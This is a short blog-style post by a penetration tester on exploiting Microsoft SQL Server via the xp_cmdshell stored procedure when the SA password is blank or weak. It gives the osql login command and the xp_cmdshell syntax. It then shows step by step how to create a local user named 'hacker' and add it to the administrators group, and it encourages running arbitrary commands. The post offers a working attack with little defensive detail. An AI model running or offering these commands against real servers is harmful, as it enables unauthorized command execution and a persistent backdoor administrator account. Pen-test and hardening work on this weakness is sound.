In doing a recent pen test…just a reminder to not forget about easy things that a DBA might over look like keeping around a dangerous stored procedure like xp_cmdshell. While most of us spend time trying to figure out complex and creative ways to get into systems…sometimes it’s the simple things that get over looked.
If you find a blank or easy to guess SA password and the database is Microsoft SQL 7, 2000, or 2005 (xp_cmdshell is also available in Sybase but you would use the iSql tool) you can use the “osql” utility to easily connect to the database and run commands if xp_cmdshell is enabled. Osql is installed with a MSDE or SQL Server installation.
If xp_cmdshell is not enabled you can restore the procedure pretty easily as well. Here is a article on this. Note that a Google search can give you more information on restoring xp_cmdshell (even if the .dll was removed).
So what are the commands to use?
osql -S [host name or IP] -U sa -P [password or “” for null]
exec master..xp_cmdshell ‘command to run’
go
So for example…say I want to create a local administrator account on a Windows SQL server with xp_cmdshell enabled:
exec master..xp_cmdshell ‘net user hacker password /add’
go
exec master..xp_cmdshell ‘net localgroup administrators hacker /add’
go
You can run any command you like so you can get creative!